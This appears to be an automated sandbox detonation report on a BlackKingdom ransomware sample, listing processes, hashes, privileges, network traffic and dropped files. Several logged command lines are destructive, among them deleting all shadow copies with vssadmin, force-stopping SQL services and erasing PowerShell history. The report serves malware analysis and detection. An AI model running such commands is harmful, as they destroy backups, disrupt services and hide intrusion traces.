C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	8.8.8.8.in-addr.arpa	udp
US	8.8.8.8:53	228.249.119.40.in-addr.arpa	udp
US	8.8.8.8:53	88.210.23.2.in-addr.arpa	udp
US	8.8.8.8:53	73.31.126.40.in-addr.arpa	udp
US	8.8.8.8:53	57.169.31.20.in-addr.arpa	udp
US	8.8.8.8:53	28.118.140.52.in-addr.arpa	udp
US	8.8.8.8:53	196.249.167.52.in-addr.arpa	udp
US	8.8.8.8:53	26.165.165.52.in-addr.arpa	udp
US	8.8.8.8:53	56.126.166.20.in-addr.arpa	udp
US	8.8.8.8:53	172.214.232.199.in-addr.arpa	udp
US	8.8.8.8:53	88.156.103.20.in-addr.arpa	udp
US	8.8.8.8:53	59.28.101.95.in-addr.arpa	udp
US	8.8.8.8:53	208.73.46.23.in-addr.arpa	udp
US	8.8.8.8:53	tse1.mm.bing.net	udp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	8.8.8.8:53	23.236.111.52.in-addr.arpa	udp

Files

\Device\HarddiskVolume1\Boot\da-DK\How To Restore Your Files.txt

MD5	b6e97028103bc6b18214f4b2bd0e0d23
SHA1	4c202c77782d55af635c28fa71b2ba58b294415e
SHA256	db1c8cafdedfc4be8dd6b81aa086b998ae49ad929b8a260d4030c7b5ca373a45
SHA512	214f7e9354a76f031bc3d28c6c20b3d5fafed32e5cb2d7414b7c2d185637d2f47e3538b62c722ba8b018cb3e6e3d9ff11bd6437d3f2af8eca9cd8504eb8c0f7d

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

MD5	9529dd2edc12daa0053af1c53b9fa8dd
SHA1	427cc4600ddb4a417f6373a7e41b1e59310f847d
SHA256	17711c2306ee8b05fd4dfae2455502eb08d8a0dac9a91484fa86e37fbeadf55f
SHA512	853f60edc353c4dadfc1aa60d2411f3f36667e96bb91215a7be22cac62bf574dfac35162958a4b599d9501d3516016d25e39949078432107ea7658ee3001682c

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

MD5	3c8e8e7798495fd4134c49c66f8ee416
SHA1	7c8588716f67c8bae2cd909ad7e2567c66157834
SHA256	7767f4f12d984d245d36995afc11a68100719b01414f903ad5f63d8c918e140e
SHA512	47704b2b545c1572cd15bd1f49391dd88cbf23b779def330e70ad37635e47fe4f2dc3091d081e9778d8bbd38e2bcc14dfa5c47ba37b00b87f719fbec9f95211a

Analysis: behavioral9

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win7-20240704-en

Max time kernel

150s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

Signatures

Loads dropped DLL

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description	Indicator	Process	Target
File created	C:\Users\Admin\Favorites\Links for United States\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Saved Games\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Music\Sample Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	F:\$RECYCLE.BIN\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Contacts\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Favorites\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Recorded TV\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Videos\Sample Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\$Recycle.Bin\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Favorites\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Searches\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Public\Libraries\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
File created	C:\Users\Admin\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: 35	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A

Suspicious use of SetWindowsHookEx

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 1292 wrote to memory of 860	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
PID 1292 wrote to memory of 860	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
PID 1292 wrote to memory of 860	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
PID 860 wrote to memory of 944	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 944	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 944	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Windows\system32\cmd.exe
PID 944 wrote to memory of 1784	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 1784	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 1784	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 860 wrote to memory of 1336	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1336	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 1336	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe	C:\Windows\system32\cmd.exe
PID 1336 wrote to memory of 2928	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1336 wrote to memory of 2928	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1336 wrote to memory of 2928	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell Get-Service *sql*|Stop-Service -Force 2>$null

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Service *sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell rm (Get-PSReadlineOption).HistorySavePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell rm (Get-PSReadlineOption).HistorySavePath

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	mega.io	udp
LU	66.203.124.37:80	mega.io	tcp
LU	66.203.124.37:443	mega.io	tcp
US	8.8.8.8:53	g.api.mega.co.nz	udp
LU	66.203.125.15:443	g.api.mega.co.nz	tcp
LU	66.203.125.15:443	g.api.mega.co.nz	tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI12922\ucrtbase.dll

MD5	298e85be72551d0cdd9ed650587cfdc6
SHA1	5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256	eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512	3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-core-localization-l1-2-0.dll

MD5	54d2f426bc91ecf321908d133b069b20
SHA1	78892ea2873091f016daa87d2c0070b6c917131f
SHA256	646b28a20208be68439d73efa21be59e12ed0a5fe9e63e5d3057ca7b84bc6641
SHA512	6b1b095d5e3cc3d5909ebda4846568234b9bc43784919731dd906b6fa62aa1fdf723ac0d18bca75d74616e2c54c82d1402cc8529d75cb1d7744f91622ac4ec06

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-core-processthreads-l1-1-1.dll

MD5	d1b3cc23127884d9eff1940f5b98e7aa
SHA1	d1b108e9fce8fba1c648afaad458050165502878
SHA256	51a73fbfa2afe5e45962031618ec347aaa0857b11f3cf273f4c218354bfe70cb
SHA512	ee5e0d546190e8ba9884ab887d11bb18fc71d3878983b544cd9ab80b6dd18ad65e66fe49fe0f4b92cbc51992fb1c39de091cf789159625341a03f4911b968fa2

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-core-file-l1-2-0.dll

MD5	b5060343583e6be3b3de33ccd40398e0
SHA1	5b33b8db5d6cfb0e8a5bb7f209df2c6191b02edb
SHA256	27878021c6d48fb669f1822821b5934f5a2904740bebb340b6849e7635490cb7
SHA512	86610edc05aa1b756c87160f9eefe9365e3f712c5bed18c8feca3cae12aef07ccc44c45c4be19dc8f9d337a6f6709b260c89019a5efcfe9fa0847d85ab64d282

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-core-timezone-l1-1-0.dll

MD5	36165a5050672b7b0e04cb1f3d7b1b8f
SHA1	ef17c4622f41ef217a16078e8135acd4e2cf9443
SHA256	d7ab47157bff1b2347e7ae945517b4fc256425939ba7b6288ff85a51931568a7
SHA512	da360ff716bb66dd1adb5d86866b4b81b08a6fe86362fded05430f833a96934ccdada1b3081b55766a4a30c16d0d62aa1715b8839ea5c405a40d9911715dae68

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-core-file-l2-1-0.dll

MD5	2e8995e2320e313545c3ddb5c71dc232
SHA1	45d079a704bec060a15f8eba3eab22ac5cf756c6
SHA256	c55eb043454ac2d460f86ea26f934ecb16bdb1d05294c168193a05090bf1c56c
SHA512	19adcc5dd98f30b4eebefe344e1939c93c284c802043ea3ac22654cf2e23692f868a00a482c9be1b1e88089a5031fa81a3f1165175224309828bd28ee12f2d49

C:\Users\Admin\AppData\Local\Temp\_MEI12922\python37.dll

MD5	c4709f84e6cf6e082b80c80b87abe551
SHA1	c0c55b229722f7f2010d34e26857df640182f796
SHA256	ca8e39f2b1d277b0a24a43b5b8eada5baf2de97488f7ef2484014df6e270b3f3
SHA512	e04a5832b9f2e1e53ba096e011367d46e6710389967fa7014a0e2d4a6ce6fc8d09d0ce20cee7e7d67d5057d37854eddab48bef7df1767f2ec3a4ab91475b7ce4

C:\Users\Admin\AppData\Local\Temp\_MEI12922\VCRUNTIME140.dll

MD5	89a24c66e7a522f1e0016b1d0b4316dc
SHA1	5340dd64cfe26e3d5f68f7ed344c4fd96fbd0d42
SHA256	3096cafb6a21b6d28cf4fe2dd85814f599412c0fe1ef090dd08d1c03affe9ab6
SHA512	e88e0459744a950829cd508a93e2ef0061293ab32facd9d8951686cbe271b34460efd159fd8ec4aa96ff8a629741006458b166e5cff21f35d049ad059bc56a1a

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-runtime-l1-1-0.dll

MD5	dbd23405e7baa8e1ac763fa506021122
SHA1	c50ae9cc82c842d50c4317034792d034ac7eb5be
SHA256	57fe2bab2acb1184a468e45cebe7609a2986d5220bb2d82592b9ca6e22384f89
SHA512	dafea32e44224b40dcc9ca96fd977a7c14128ca1dd0a6144844537d52ba25bcec83c2fa94a665a7497be9e079e7fc71298b950e3a8a0c03c4a5c8172f11063b9

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-string-l1-1-0.dll

MD5	aacade02d7aaf6b5eff26a0e3a11c42d
SHA1	93b8077b535b38fdb0b7c020d24ba280adbe80c3
SHA256	e71d517e6b7039437e3fc449d8ad12eeeca0d5c8ed1c500555344fd90ddc3207
SHA512	e02fcbcb70100f67e65903d8b1a7e6314cabfb0b14797bd6e1c92b7bcb3994a54133e35d16da0a29576145b2783221330591526f856b79a25c0575fc923985a6

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-heap-l1-1-0.dll

MD5	a22f9a4cbd701209842b204895fedf37
SHA1	72fa50160baf1f2ea2adcff58f3f90a77a59d949
SHA256	2ee3d52640d84ac4f7f7ddfe748f51baa6fd0d492286c781251222420e85ca97
SHA512	903755d4fa6651669295a10e66be8ea223cd8d5ad60ebe06188d8b779fef7e964d0aa26dc5479f14aab655562d3c1ef76b86790fb97f991eaf52da0f70e40529

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-stdio-l1-1-0.dll

MD5	5df2410c0afd30c9a11de50de4798089
SHA1	4112c5493009a1d01090ccae810500c765dc6d54
SHA256	e6a1ef1f7c1957c50a3d9c1d70c0f7b0d8badc7f279cd056eb179dc256bfefda
SHA512	8ecb79078d05d5b2a432f511953985b3253d5d43d87709a5795709ee8dbca63c5f1166ed94d8984c13f2ea06adfa7d6b82c6735c23c6e64f2f37a257066864e6

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-math-l1-1-0.dll

MD5	c4cac2d609bb5e0da9017ebb535634ce
SHA1	51a264ce4545a2f0d9f2908771e01e001b4e763e
SHA256	7c3336c3a50bf3b4c5492c0d085519c040878243e9f7d3ea9f6a2e35c8f1f374
SHA512	3b55bdbc5132d05ab53852605afe6ed49f4b3decdde8b11f19a621a78a37d98c7aeaaa8c10bf4565b9b50162816305fa5192ee31950a96dc08ae46bfc6af4ffe

\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-convert-l1-1-0.dll

MD5	0485c463cd8d2ae1cbd42df6f0591246
SHA1	ea634140905078e8f687a031ae919cff23c27e6f
SHA256	983f4d4c7b7330e7f5f091080c1e81905575ebccd97e11dff8a064979ec8d9b8
SHA512	ddf947a1b86c3826859570a3e1d59e4ec4564cfcf25c84841383a4b5f5ad6c2fe618078416aed201fb744d5fbd6c39dab7c1e964dd5e148da018a825fcc0044a

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-locale-l1-1-0.dll

MD5	ba17b278fff2c18e34e47562ddde8166
SHA1	bed762d11b98737fcf1d1713d77345ec4780a8c2
SHA256	c36f5c0ac5d91a8417866dd4d8c670c2192ba83364693e7438282fb8678c3d1e
SHA512	72516b81606ccf836549c053325368e93264fdebc7092e42e3df849a16ccefa81b7156ae5609e227faa7c9c1bf9d68b2ac349791a839f4575728f350dd048f27

